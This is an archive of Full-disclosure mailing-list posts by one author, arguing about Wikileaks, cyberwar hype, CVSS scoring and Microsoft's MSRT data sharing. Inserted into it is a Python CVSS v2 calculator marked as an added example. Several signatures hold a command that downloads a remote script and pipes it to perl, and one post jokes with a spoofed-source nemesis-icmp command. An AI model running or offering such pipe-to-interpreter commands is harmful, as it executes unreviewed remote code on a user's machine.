2010-10-08 Thread J. Oquendo
Jonathan Kamens wrote:
> J. is not so sanguine about the mission of Wikileaks and/or how well it
> fulfills it and/or how important it is for protecting our lives and
> liberties.  As we see from this comment:

How well it protects whose liberties? Show me some factual information
on where it saved anything for anyone. Or please explain to me and
perhaps the thousands of soldiers from ALL SORTS of countries in
Afghanistan, etc, how its protecting them by outing information with
regards to military operations. Give me a break, I've been there, done
that and to be honest, I grew up a while ago so spare the give me
Wikileaks or give me death speech. Wikileaks wasn't the first, nor will
it be the last.


> In any case, if I'm right that this is the kind of security issue that
> J. was referring to, then I agree with others who have said that this
> discussion does not belong on full-disclosure, and this will be my first
> and last message on the topic.


1) Security regarding network and or computing related capabilities,
contexts, etc There is no purpose to the initial message and or thread
2) Security regarding wikileaks defending against ANYTHING other than
someone's own pockets... Is also irrelevant.

Perception and reality are two different equations to any interpretation
of fact/story/etc. While you and others like you believe "Wikileaks! -
Defender of Justice", I see "Wikiwhore - Take the money and run".

Again, been there done that when I ran Politrix way before wikileaks
became a site, been there done that with JYA/Cryptome, been there done
that with J Orlin Grabbe (RIP) and the list goes on. Spare me and the
list the dramatics.

-- 

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
J. Oquendo
SGFA, SGFE, C|EH, CNDA, CHFI, OSCP, CPT

It takes 20 years to build a reputation and five minutes to
ruin it. If you think about that, you'll do things
differently. - Warren Buffett

227C 5D35 7DCB 0893 95AA  4771 1DCE 1FD1 5CCD 6B5E
http://pgp.mit.edu:11371/pks/lookup?op=get&search=0x5CCD6B5E



[Full-disclosure] SANS ... CERT Handler

2009-08-27 Thread J. Oquendo

Can one of you guys shoot me an email

-- 

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
J. Oquendo
SGFA, SGFE, C|EH, CNDA, CHFI, OSCP

It takes 20 years to build a reputation and five minutes to
ruin it. If you think about that, you'll do things
differently. - Warren Buffett

227C 5D35 7DCB 0893 95AA  4771 1DCE 1FD1 5CCD 6B5E
http://pgp.mit.edu:11371/pks/lookup?op=getsearch=0x5CCD6B5E



Re: [Full-disclosure] can someone please try and explain to me....

2009-07-09 Thread J. Oquendo
valdis.kletni...@vt.edu wrote:
 On Thu, 09 Jul 2009 13:06:58 EDT, J Michael Graham said:

  Man, I LOVE sayin it. I say it all the time. Boss comes in talking
  about budget cuts, I just stand up shouting CYBERWAR!! and he backs
  out the doorway. Mission accomplished.

 I find completing sentences with As prophesied in ancient scripture does
 that to bosses too.

 The problem is that most of what we've seen has been more properly described
 as 'cyber-espionage' or 'cyber-border-skirmish'.  But most journalists' eyes
 glaze over if there's more than 7-8 letters in the word, so we're stuck with
 them using 'cyberwar'.

I personally find that it's more appealing and spookier to say
cyberwar if you want to pass through - I don't know - your agenda,
your budget. Nothing says We're underfunded from contractors more than
cyberwar. Remember, many quotes come from many-a-DoD-contractor. Keep
that in mind, when the sayings slash quotes shift from Korea is
e-nuking us to we can neither confirm nor deny or we simply don't
know you have to look at who's talking:

In the dozens of instances that I worked over the past decade, I cannot
recall a single instance in which someone intending to attack came from
the source it appeared to have come from, said Dale W. Meyerrose,
former chief information officer for the Office of the Director of
National Intelligence. Most attackers in cyberspace try to mask who
they really are. (NY Times)

“The code is really pretty elementary in many respects,” he added. “I’m
doubting that the author is a computer science graduate student.” Jose
Nazario

I put my money on Arbor's view. Remember, earlier this year according to
media and government, China was all the rage. Budgets were passed and
ironically all the Chinese hackers in the world retired. Think about
that for a minute or two. It could make a good episode of Where are
they now? In the interim, politics will be what politricks will be:

dod-contractor:~# nemesis-icmp -S 202.130.245.42 -D 127.0.0.1 -i 4 
echo China's cyberattacking us! We're simply underfunded |mail -s
Cyberwarefare Siobhan.Gorman at wsj.com


-- 

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
J. Oquendo
SGFA, SGFE, C|EH, CNDA, CHFI, OSCP

It takes 20 years to build a reputation and five minutes to
ruin it. If you think about that, you'll do things
differently. - Warren Buffett

227C 5D35 7DCB 0893 95AA  4771 1DCE 1FD1 5CCD 6B5E
http://pgp.mit.edu:11371/pks/lookup?op=getsearch=0x5CCD6B5E


[Full-disclosure] Introducing RMBSS - Risk Metrics Budgetary Scoring System

2009-03-31 Thread J. Oquendo

Infiltrated Research Group is proud to introduce RMBSS Risk Metrics
Budgetary Scoring System. A synergy of best practices frameworks
that synchronizes industry known security frameworks for more
thorough Risk Assessments and Analysis. The concept was born out
of the need for Information Security Managers (CSO's/CIO's/CISO's)
to realize value added security metrics. While our initial version is in its
preliminary stages, we're confident that our improved methods of
security correlation events in an architecture will guarantee proven
actionable security results. 


Infiltrated Research Group

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
J. Oquendo
SGFA, SGFE, C|EH, CNDA, CHFI, OSCP

Enough research will tend to support your
conclusions. - Arthur Bloch

A conclusion is the place where you got
tired of thinking - Arthur Bloch

227C 5D35 7DCB 0893 95AA  4771 1DCE 1FD1 5CCD 6B5E
http://pgp.mit.edu:11371/pks/lookup?op=getsearch=0x5CCD6B5E



Re: [Full-disclosure] Apple Safari ... DoS Vulnerability

2009-02-27 Thread J. Oquendo
On Fri, 27 Feb 2009, Thierry Zoller wrote:

 
 If we want to arrive at a state where risk can be managed, it needs
 to be measured. And if we aren't that far in 2009 I pity us all.

One of the most difficult tasks in risk management has always
been the measurement factorability. Many books have been published,
almost all give differing points of view on quantitative, qualitative,
theoretical postures and we can continue to puke on the math.

Security metrics (which happens to be an excellent book) is
probably one of the most insane topics with regards to security
management. We can never get to a degree of real world numbers
because everyone's view will be different. So let's place this
Safari bug for example as a high impact and use CVSS as a guide:

AV:N/AC:L/Au:N/C:C/I:C/A:C

CVSS Base Score 10
Impact Subscore 10
Exploitability Subscore 10
CVSS Temporal Score 9
CVSS Environmental Score 9.4
Modified Impact Subscore 10
Overall CVSS Score 9.4

Now how can I place this into the equation of my current
infrastructure's security posture? No one here uses a MAC
let alone Safari for Windows so technically this doesn't
affect me. However, from time to time, we may have a vendor
come in, get thrown on a network after connecting to a NAC
device, at that instance should I revamp the numbers? Surely
I'm placed at risk.
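The vector quoted above is a CVSS v2 vector, and the question the post raises (how does a 10.0 for a Safari bug land in an estate with no Safari?) is exactly what the v2 environmental group is for. As an added example, not part of the original post, the script below implements the CVSS v2.0 base, temporal and environmental equations with the specification's weights, scores the post's vector, and then varies Target Distribution (TD) to model "nobody here runs Safari" against "a vendor laptop lands on the NAC segment now and then". The temporal and environmental settings behind the post's own 9 and 9.4 are not given in the post, so they are left Not Defined here; the TD scenarios are the example's own assumptions.

```python
from decimal import Decimal, ROUND_HALF_UP

# Metric weights from the CVSS v2.0 specification.
BASE_WEIGHTS = {
    "AV": {"L": 0.395, "A": 0.646, "N": 1.0},
    "AC": {"H": 0.35, "M": 0.61, "L": 0.71},
    "Au": {"M": 0.45, "S": 0.56, "N": 0.704},
    "C":  {"N": 0.0, "P": 0.275, "C": 0.660},
    "I":  {"N": 0.0, "P": 0.275, "C": 0.660},
    "A":  {"N": 0.0, "P": 0.275, "C": 0.660},
}
TEMPORAL_WEIGHTS = {
    "E":  {"U": 0.85, "POC": 0.9, "F": 0.95, "H": 1.0, "ND": 1.0},
    "RL": {"OF": 0.87, "TF": 0.90, "W": 0.95, "U": 1.0, "ND": 1.0},
    "RC": {"UC": 0.90, "UR": 0.95, "C": 1.0, "ND": 1.0},
}
ENV_WEIGHTS = {
    "CDP": {"N": 0.0, "L": 0.1, "LM": 0.3, "MH": 0.4, "H": 0.5, "ND": 0.0},
    "TD":  {"N": 0.0, "L": 0.25, "M": 0.75, "H": 1.0, "ND": 1.0},
    "CR":  {"L": 0.5, "M": 1.0, "H": 1.51, "ND": 1.0},
    "IR":  {"L": 0.5, "M": 1.0, "H": 1.51, "ND": 1.0},
    "AR":  {"L": 0.5, "M": 1.0, "H": 1.51, "ND": 1.0},
}


def round1(x):
    """round_to_1_decimal as used in the spec (half up, not banker's rounding)."""
    return float(Decimal(repr(x)).quantize(Decimal("0.1"), rounding=ROUND_HALF_UP))


def parse_vector(vector):
    """Turn 'AV:N/AC:L/Au:N/C:C/I:C/A:C[/E:../TD:..]' into {metric: value}."""
    return dict(part.split(":", 1) for part in vector.split("/"))


def weight(table, m, name):
    # Temporal and environmental metrics are optional and default to Not Defined.
    return table[name][m.get(name, "ND")]


def impact_subscore(m, adjusted=False):
    c, i, a = (BASE_WEIGHTS[k][m[k]] for k in ("C", "I", "A"))
    if adjusted:  # AdjustedImpact scales each part by its security requirement.
        c *= weight(ENV_WEIGHTS, m, "CR")
        i *= weight(ENV_WEIGHTS, m, "IR")
        a *= weight(ENV_WEIGHTS, m, "AR")
    return min(10.0, 10.41 * (1 - (1 - c) * (1 - i) * (1 - a)))


def exploitability_subscore(m):
    return 20 * BASE_WEIGHTS["AV"][m["AV"]] * BASE_WEIGHTS["AC"][m["AC"]] \
        * BASE_WEIGHTS["Au"][m["Au"]]


def base_score(m, adjusted=False):
    imp = impact_subscore(m, adjusted)
    f_impact = 0.0 if imp == 0 else 1.176
    return round1(((0.6 * imp) + (0.4 * exploitability_subscore(m)) - 1.5) * f_impact)


def temporal_score(m, adjusted=False):
    factor = 1.0
    for name in ("E", "RL", "RC"):
        factor *= weight(TEMPORAL_WEIGHTS, m, name)
    return round1(base_score(m, adjusted) * factor)


def environmental_score(m):
    # The environmental score is the adjusted temporal score, raised by
    # collateral damage potential and then scaled by target distribution.
    adj_temporal = temporal_score(m, adjusted=True)
    cdp = weight(ENV_WEIGHTS, m, "CDP")
    td = weight(ENV_WEIGHTS, m, "TD")
    return round1((adj_temporal + (10 - adj_temporal) * cdp) * td)


def score(vector):
    m = parse_vector(vector)
    return {
        "base": base_score(m),
        "impact": round1(impact_subscore(m)),
        "exploitability": round1(exploitability_subscore(m)),
        "temporal": temporal_score(m),
        "environmental": environmental_score(m),
    }


if __name__ == "__main__":
    SAFARI = "AV:N/AC:L/Au:N/C:C/I:C/A:C"   # the vector quoted in the post
    print("as published:      ", score(SAFARI))
    # Assumed environments (constructed for this example, not from the post):
    print("no Safari anywhere:", score(SAFARI + "/CDP:N/TD:N")["environmental"])
    print("occasional vendor: ", score(SAFARI + "/CDP:N/TD:L")["environmental"])
```

With every environmental metric Not Defined the environmental score simply echoes the base score, which is why a raw 10.0 tells a CSO nothing about their own estate; setting TD:N drives it to 0.0 and TD:L (the vendor-on-the-NAC case) to 2.5. The same functions score any v2 vector, for instance the common AV:N/AC:L/Au:N/C:P/I:P/A:P comes out at 7.5.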

It's easy to say if we aren't that far in X hell we aren't
far enough to have IPv6 fully deployed after so many years
let alone for the security community to be able to come up
with a definitive risk metric scale. The problem is, who
is doing the math - compounded by terms like risk appetite
and fuzzy math tricksters. Risk Appetite sorry my stomach
is full. It's a horrendous concept.

Pick your poisonous organization, ISACA, ISC2, OGC. They
will all give you a methodology into measurement practices
and almost certainly all can be tweaked like a magician
with a sleight of hand to make the most extreme exploit look
harmless and the most harmless look extreme.

By the way, I'm now selling a Risk Management and Scoring
tool for $19.99 that will allow you to enter a program and
define what you think the risk is. The program will allow
you to pick your target: CIO, CEO, CSO. It will then go
out and create a custom chart to maximize your budgetary
request or downplay a potential threat.

What's going on Thierry, Mike.


=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
J. Oquendo
SGFA, SGFE, C|EH, CNDA, CHFI, OSCP

Enough research will tend to support your
conclusions. - Arthur Bloch

A conclusion is the place where you got
tired of thinking - Arthur Bloch

227C 5D35 7DCB 0893 95AA  4771 1DCE 1FD1 5CCD 6B5E
http://pgp.mit.edu:11371/pks/lookup?op=getsearch=0x5CCD6B5E



Re: [Full-disclosure] Hotel Network Security: A Study of Computer Networks in U.S. Hotels

2008-10-02 Thread J. Oquendo
On Thu, 02 Oct 2008, Josh Ogle wrote:

 the technology exists to increase a hotel network's security, a hotel
 could potentially be considered at fault for not taking the necessary 
 precautions to protect their guests from hackers.

FYI, just because the technology exists does not mean
hoteliers have to run out and accommodate everyone in
deploying these technologies. If employees were trained
in the risks associated with technology, many of these
technologies would go the way of the dinosaur.

Supposing someone made you aware of the danger of
logging into a network because of the impact of
sniffers. Would you PERSONALLY be cruising random
hotspots. If you knew definitively the person who
runs the network could see and record everything
you did, I'm sure the chances of you picking up
any network to surf on would diminish.

Many people aren't aware of the dangers and this
is the root of the problem. Technology is nothing
more than a stepping stone. Corporations have the
capabilities (or should have) to protect their
assets on a layered approach and instances like
this - employees hooking up from a hotel - can be
mitigated way before the fact. It's called policy.



=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
J. Oquendo
SGFA, SGFE, CNDA, CHFI, OSCP

A good district attorney can indict a ham sandwich
if he wants to ... The accusations harm as much as
the convictions ... they're obviously harmful or it
wouldn't be news.. - John Carter

wget -qO - www.infiltrated.net/sig|perl

http://pgp.mit.edu:11371/pks/lookup?op=getsearch=0x3AC173DB



Re: [Full-disclosure] Microsot DID DISCLOSE potential Backdoor

2008-05-08 Thread J. Oquendo
On Thu, 08 May 2008, Paul Schmehl wrote:

 You're comparing apples with oranges.  The is precisely the muddying of the
 waters that J. Oquendo is seeking to stir up emotions.

And you know me this well to infer it's stirring up emotions. I call it
raising awareness. You have your interpretation of what you read, I have
mine. Is yours wrong Paul. You state waa waa waa I ran the tool it did
nothing therefore you are wrong J. Oquendo I'm Paul Schmehl! Did you
run it on an infected machine Mr. Schmehl. No so please explain how you
yourself did not muddy this water.

 It clearly says that on the download page.  It's not Microsoft's fault if
 you don't bother to read it.

It is Microsoft's fault for not being honest period no ifs ands or buts.
Please give us your professional correlation of the article. Information
obtained from MSRT was used to track botnet hunters in cahoots with another
tool.

 Yes, their web page (I don't see any EULA) states that they don't collect
 personally identifiable information.  Furthermore, the botnet tool is a
 separate tool.  The page also states that after the tool is run, it deletes
 itself.  So, when you are infected with something, the tool will detect and
 clean it *and* send some information about the infection back to M$.

Can you please find this page. I showed you mine show me yours or just STFU
for now, otherwise the my cojones are bigger than yours becomes redundant
nonsense. EOS

-- 
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
J. Oquendo
SGFA #579 (FW+VPN v4.1)
SGFE #574 (FW+VPN v4.1)

wget -qO - www.infiltrated.net/sig|perl

http://pgp.mit.edu:11371/pks/lookup?op=getsearch=0x3AC173DB



Re: [Full-disclosure] Microsot DID DISCLOSE potential Backdoor

2008-05-08 Thread J. Oquendo

 Of course, with the weasel words may have, inadvertently and
 potential, you can always claim you never really said that, but you know
 exactly what the reader will take away from that headline - What???
 Microsoft installed a backdoor on my computer
 Microsoft installed a backdoor on my computer

 Then you make this amazing leap of logic.

This is your interpretation my CORRELATION. If it did not obtain info
from MSRT how would have MS created the Botnet tool. I'm not making
any amazing leaps of anything other than correlation. If they didn't
they shouldn't have mentioned it in the article. You don't see any
Ferrari mechanics start talking about Ferrari engines in a mechanics
article, and next paragraph talk about speed and not correlate it with
a Ferrari; that would be insanely stupid. Gee Wilbur I don't mean
Ferrari I meant a Yugo.

 So, in one sentence you tie the MSRT to the botnet buster and go from it
 sends data to it spies on you.  Nice try, but you're not fooling anyone
 except fools.

How did I tie anything. Microsoft implies this in their article in
MY interpretation. Again, I don't know about you but I've never had
the exposure you have to see someone do so.

 BTW, a backdoor program is something that allows me to access your computer
 without your knowledge any time I want to, not a program that sends me
 information whenever you choose to run it *if* you choose to send it.
 Again, nice try, but you're not fooling anyone except fools and conspiracy
 theorists.

And you're the architect of this definition? I used the Wiki entry:

/ READ 
A backdoor in a computer system (or cryptosystem or algorithm) is a method
of bypassing normal authentication, securing remote access to a computer,
obtaining access to plaintext, and so on, while attempting to remain
undetected. The backdoor may take the form of an installed program (e.g.,
Back Orifice), or could be a modification to an existing program or
hardware device.
/ END READ

I don't know about you but one, I never agreed to share the information
with MS in the first place. THEY IMPOSED IT. And your argument about
removing it is MOOT. This is my MAIN RANT. ASK ME BEFOREHAND DON'T
ASSUME I AM YOUR GUINEA PIG. Does this register logically to anyone
else. The argument here isn't about what MS is actually doing with the
information, if they told me beforehand I would have the OPTION to
provide information. I wouldn't have had it shoved down my throat
because Microsoft is trying to assist LEA. You're missing the entire
GIST of it.

If you understood more about me, you would have known better to label
this as theorist or alarmist. Facts are facts. Is MS obtaining info
from my machine YES Is MS passing information obtained from my machine
to LEA YES. Is it identifiable. YES IP IS USED AS AN IDENTIFIER either
way you cut it. I could care less whether or not if they are or aren't
using the information. FACT LEA WILL ATTEMPT TO IDENTIFY YOU VIA IP.
FACT YOU ARE IDENTIFIED IN THE FORM OF AN IP THE MOMENT YOU CONNECT.
You CONNECTED did the packets get there via RFC2549. FACT. Did MS
ever notify me they would be sharing information NO. FACT.

We could copy and paste until the cows come home. I stand by what I
state and at this point its a matter of interpretation. You can infer
what you'd like by my FACTS but they are what they are according to
what was disclosed by Microsoft NOT ME.

-- 
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
J. Oquendo
SGFA #579 (FW+VPN v4.1)
SGFE #574 (FW+VPN v4.1)

Experience hath shewn, that even under the best
forms (of government) those entrusted with power
have, in time, and by slow operations, perverted
it into tyranny. Thomas Jefferson

wget -qO - www.infiltrated.net/sig|perl

http://pgp.mit.edu:11371/pks/lookup?op=getsearch=0x3AC173DB



Re: [Full-disclosure] Microsot DID DISCLOSE potential Backdoor

2008-05-07 Thread J. Oquendo
On Wed, 07 May 2008, Paul Schmehl wrote:

 And that relates to the MSRT how?

Relates to MSRT sending your information. It only sends information
when it finds something. I never stated it sends all your information
all the time.

 Now you're being silly.  You're claiming that *realtime connection 
 information* is included in the data that is sent but without any grounds 
 to do so and despite Microsoft's claims to the contrary.  And without any 
 proof.
 

Pick up a dev machine load it with malware, run MSRT, and sniff it. You'll
see what it sends and remember LEA uses IP as an identifier bottom line.

 You might try it some time.  Getting the facts beats wild speculation and 
 hyperbole every time.  I just installed MSRT on my laptop and ran it while 
 Wireshark was monitoring all external communications.  It sent exactly 
 *zero* information to MS.

It sent zero information because it did not detect anything malicious.
As for paranoia, has nothing to do with paranoia. Facts. Fact 1) Is MS
sending information from your machine to them ... Yes Fact 2) If something
malicious is detected on your machine will it go to MS. Yes. Fact 3) Will
they share information obtained from YOUR machine via YOUR IP address
will they share that information with LEA? According to the MS spokesman
they will. Fact 4) Can LEA correlate the information sent from your machine
to an IP address... Yes.

Go back and look at the information MS is obtaining it's in the log file.
So looking at Sasser, lets fiddle with this:

 
Quick Scan Results:

Found virus: Win32/Sasser.A.worm in file://C:\WINDOWS\avserve.exe
Found virus: Win32/Sasser.A.worm in 
regkey://HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN\\avserve.exe
Found virus: Win32/Sasser.A.worm in 
runkey://HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN\\avserve.exe
Found virus: Win32/Sasser.A.worm in file://C:\WINDOWS\avserve.exe
 
Quick Scan Removal Results

Start 'remove' for 
regkey://HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN\\avserve.exe
Operation succeeded !
 
Start 'remove' for 
runkey://HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN\\avserve.exe
Operation succeeded !
 
Start 'remove' for file://\\?\C:\WINDOWS\avserve.exe
Operation succeeded !
 
Results Summary:

Found Win32/Sasser.A.worm and Removed!
 
Return code: 6
Microsoft Windows Malicious Software Removal Tool Finished On Mon Mar 19 
13:15:57 2007

(from their website).

Now according to their article and common logic, in their article they stated
they obtained samples of the infection to track the CNC of a botnet. How did
they get this is up in the air, but with their forced update history, it's
possible on detection they can actually send avserve.exe right back to 
themselves.

Anyhow, so I create something crafted to implicate you - using my previous
analogy of being a botnet CNC owner, my program implicates your network
you take the fall. People pull Joe Jobs all the time.

 Not all of us are consumed by paranoia and unfounded fears.  Some of us 
 actually approach security from a rational, intelligent perspective and 
 attempt to mitigate risks to the best of our abilities while accepting the 
 fact that we can't stop every attack.

A Joe Job is an unfounded fear? How about poisoning the well. What happens
if someone reading this decides to put it to the tests nullifying any
verifiable, concrete snapshots with garbage. Then what will be of the
tool? e-Garbage truck?

 I don't consider fantasizing about bogeymen thinking outside the box.

Fantasizing has nothing to do with reality. People are paying top dollars
in life to screw someone all the time whether its online or not. This is
another stupid mechanism someone can use. Its a flawed concept albeit nice
idea.


-- 
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
J. Oquendo
SGFA #579 (FW+VPN v4.1)
SGFE #574 (FW+VPN v4.1)

wget -qO - www.infiltrated.net/sig|perl

http://pgp.mit.edu:11371/pks/lookup?op=getsearch=0x3AC173DB



Re: [Full-disclosure] Microsot DID DISCLOSE potential Backdoor

2008-05-06 Thread J. Oquendo
On Tue, 06 May 2008, Ken Schaefer wrote:

 I'm not sure the facts in evidence support the conclusions reached here 
 (sorry, not posting inline as I don't want to address each conclusion built 
 upon some other shaky conclusion.
 
 From http://support.microsoft.com/kb/890830
 
 ==
 
 Either I am missing the point of J. Oquendo's post, or the conclusions I
 think he reaches are speculation rather than established.
 
 Cheers
 Ken
 

Unsure if this made it to the list the first time, therefore I will re-take.
Outside of technical quoting I will lay it out in understandable terms.
Microsoft DOES NOT NOTIFY THE END USER THAT INFORMATION TAKEN FROM THEIR
MACHINE WILL BE FORWARDED TO ANYONE OUTSIDE OF MICROSOFT.

This *IS NOT* speculation but fact. Since you provided the link for us,
please go back and specify where Microsoft is telling us the information
they gather from Windows Malicious Software Removal WILL BE sent to
LAW ENFORCEMENT AGENCIES inside or outside the United States.

Please read the article and the wording:
http://www.pcworld.com/businesscenter/article/145257/microsoft_botnethunting_tool_helps_bust_hackers.html

/QUOTED
The software vendor is giving law enforcers access to a special tool that keeps 
tabs on botnets, using data compiled from the 450 million computer users who 
have installed the Malicious Software Removal tool that ships with Windows.
/ END QUOTE

Please find me anything in the EULA for WMSR tool that specifies they
will do as they see fit with data from my machine?

Now what's to stop them from using the same principle in the future:
We obtained information before, no one cared. RIAA cares to get a
baseline of how many Windows users have MP3's. Farfetched? I think
not. What happens a-la ATT wiretaps where Microsoft decides to say
obtain whatever information they'd like regardless of telling you
what they're doing with that information.

So you argue... Reporting is optional... It sure is, but what do
you think the response would be from MS users if MS stated We will
send your information to Law Enforcement agents anywhere...

/QUOTED:
In February, the Sûreté du Québec used Microsoft's botnet-buster to break up a 
network that had infected nearly 500,000 computers in 110 countries, according 
to Captain Frederick Gaudreau, who heads up the provincial police force's 
cybercrime unit.
/ END QUOTE

Missing the part? Its black and white. If MS wasn't using information (flawed
since it's relying on IP) then how did they correlate IP information
back to law enforcement... OUTSIDE the United States...



[Full-disclosure] Microsot DID DISCLOSE potential Backdoor

2008-05-03 Thread J. Oquendo
that there are far too many open WiFi hotspots in the world to
conclusively narrow a fact. We have an assumption that an attacker is
behind 10.10.10.159. Can we see them? No. All we know is the address.
Being I've used a private address, I won't bother diving into but he
came from ISP X in Nebraska. Irrelevant. What you have is a fishing
expedition.

/ SNIP
For more on this false sense of ID-via-IP: Well, let me ask you who you
think 171.70.120.60 is. I'll give you a hint; at this instant, there are
72 of us.

Here's another question. Whom would you suspect 171.71.241.89 is? At this
point in time, I am in Barcelona; if I were home, that would be my
address as you would see it, but my address as I would see it would be in
10.32.244.216/29. There might be several hundred people you would see
using 171.71.241.89;
/END SNIP

I implore you to read a NANOG thread
http://readlist.com/lists/trapdoor.merit.edu/nanog/6/33246.html
Professionals know, IP is an inaccurate identifier so why does it seem
that Microsoft along with LEO are relying on this. Makes a great baseline
sure, but is certainly ripe for abuse.

Again, please understand what I am stating, this is not to say that it's
a horrible idea, it's a start, a baseline - but not a definitive measure
of determining who is controlling a bot, who created the botnet, etc.

Looking at past history, unfortunately you have the tinkerers; so what
happens to an up-and-coming security buff who is getting into the field
and stumbles upon a botnet. Sure he was moronic to join an irc channel
filled with bots, sure he was idiotic in downloading the code for the
sake of learning. Fact is he might have. Guess what will happen to him
when a Law Enforcement Agency raids his house? Guess what will happen
when that agency needs funding for a new uber Cyber(buzzword)Crime
fighting department. You guessed it. Hey Up-and-coming security buff...
Kiss your terminal goodbye, and from here on out, your dreams of becoming
the next Bruce Schneier will be close to non-existent. It happens.

Anyhow, re-emphasizing... Shame on Microsoft for forwarding your data
without telling you. Shame on Microsoft for not asking you if you wanted
to PARTICIPATE in sending data. Shame on Microsoft for not explicitly
stating: The data we are sneaking off your computer will be sent to
government agencies of our choice. It's a horrible practice and a
damaging breach of trust. Their action worries me as a security
professional, will they ever scour for data for profit. Why not, no one
would notice or care anyway.

J. Oquendo
sil @ infiltrated dot net

-- 
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
J. Oquendo
SGFA #579 (FW+VPN v4.1)
SGFE #574 (FW+VPN v4.1)

wget -qO - www.infiltrated.net/sig|perl

http://pgp.mit.edu:11371/pks/lookup?op=getsearch=0x3AC173DB



Re: [Full-disclosure] IE/Windows blocking Firefox downloads?

2008-03-03 Thread J. Oquendo

Jan Clairmont wrote:

Never had a problem with those.   Anyone know a quick fix other than 
re-loading a sane OS?


Try sfc /scannow from a command prompt

--

J. Oquendo

SGFA #579 (FW+VPN v4.1)
SGFE #574 (FW+VPN v4.1)

wget -qO - www.infiltrated.net/sig|perl

http://pgp.mit.edu:11371/pks/lookup?op=getsearch=0xF684C42E




Re: [Full-disclosure] Disrespecting the respectable Dude VanWinkle / Justin Plazzo, illegal?

2008-02-12 Thread J. Oquendo


You need to check your spelling. Libel != Lible

Death -- Yes, legally, it is no problem to speak ill of the dead. For 
example, in James Bamford's The Puzzle Palace, a book about the National 
Security Agency, a former government employee is called a Russian spy 
even though he was never convicted of anything other than contempt of 
court. The family considered a defamation lawsuit, but learned that it 
was impossible because the subject was dead. In some cases, a libel suit 
filed by a person who dies may be continued, but relatives of a dead 
person cannot bring a libel suit.


http://www.radford.edu/~wkovarik/class/law/1.5libel.html



--

J. Oquendo

SGFA #579 (FW+VPN v4.1)
SGFE #574 (FW+VPN v4.1)

wget -qO - www.infiltrated.net/sig|perl

http://pgp.mit.edu:11371/pks/lookup?op=getsearch=0xF684C42E




Re: [Full-disclosure] Disrespecting the respectable Dude VanWinkle / Justin Plazzo, illegal?

2008-02-12 Thread J. Oquendo

Simon Smith wrote:

Ok,

Big deal I typed it wrong once. More significantly, your interpretation
of what I wrote is inaccurate. Why are you supporting the trolls?


Did you see any support of any trolls? I stay out of trolling. Besides 
death is death, its a sad loss but life moves on. People come, people 
go, had I known him I'd make a comment to no one on a public forum since 
it wouldn't be the right medium. Maybe flowers or a condolence card to 
his family would have been my route. I have little time for trolling 
especially to spit on someone who's not around to defend himself. I've 
no opinion of JP other than he seemed to be a knowledgeable person 
unlike many a poster here. I don't play the suck up game either he will 
be greatly missed. I'm sure his family and friends will miss him and I 
hope they cherish his memory lest they become robots, as for me, I 
didn't know him to make a comment. My comment was towards you and your 
incorrect ASSumption of law.



--

J. Oquendo

SGFA #579 (FW+VPN v4.1)
SGFE #574 (FW+VPN v4.1)

wget -qO - www.infiltrated.net/sig|perl

http://pgp.mit.edu:11371/pks/lookup?op=getsearch=0xF684C42E




Re: [Full-disclosure] [Professional IT Security Providers - Exposed] Layer 9 Corporation ( D )

2008-02-06 Thread J. Oquendo

secreview wrote:

We do take a few points away from Layer 9 because they resell third 
party hardware and software. We feel that companies who resell third 
party technologies become biased towards selling those technologies even 
if a better technology solution exists. This might not stand true for a 
business that makes such a strong effort to be honest like Layer 9, but 
it most certainly is true for most IT Security Providers.


Where I work we re-sell third party products and its based on an 
assessment of what the client needs. There is no one size fits all 
solution. When I contracted at a company I won't mention (one of the top 
5 computing companies) we re-sold Juniper Netscreens to migrate out 
Checkpoint to one of our clients because it fit their need. We could 
have sold them bigger equipment to accommodate for it at a higher price.


You and whomever else your cohorts are need to take a better look at 
security design as a whole instead of shooting off rambling messages 
such as these. Let's go back to 1998, 1999 pre @Stake the corporation. 
One would have cringed at L0pht's site from a CTO perspective. Does that 
mean you would have belittled them in your (pseudo)security review.


Perhaps when you called Layer9 they didn't want to be bothered with your 
BS. Perhaps somewhere there is on this list and awaited your call. I 
don't know I don't work for them.


We also noticed that Layer 9 seems to be more geared towards offering IT 
services than Professional IT Security Services. They sell PIX firewalls 
and discuss services that are designed to help their customers improve 
the performance of their IT Infrastructure. They do not offer the more 
advanced IT Security Services.


Name me one of the top 20 Fortune 500 companies that doesn't resell 
these services. You think companies don't farm out work?


Based on the little bit of information that we were able to collect 
about Layer 9, it is our opinion that Layer 9 is a trustworthy company 
that will only offer services to their customers that they are capable 
of delivering. We can not comment on the talent or capabilities of Layer 
9 as we couldn't find any information related to that. Likewise, we can 
not comment on the quality of their services.


Based on the reviews you guys put out, I take you as serious as I take 
that Indian kid ockknock whatever the hell his name was. WTF is this 
idiot talking about. If I were a CSO why would I want to take you 
serious, why should I take you serious. Let's be logical here. What are 
your credentials. What certs do you possess, how long have YOU been in 
the industry, where have you worked, what have YOU done for the security 
community.


Get a real job.

--

J. Oquendo

SGFA #579 (FW+VPN v4.1)
SGFE #574 (FW+VPN v4.1)

wget -qO - www.infiltrated.net/sig|perl

http://pgp.mit.edu:11371/pks/lookup?op=getsearch=0xF684C42E




Re: [Full-disclosure] [Professional IT Security Providers - Exposed] PlanNetGroup ( F )

2008-01-21 Thread J. Oquendo

SecReview wrote:
Nate, 
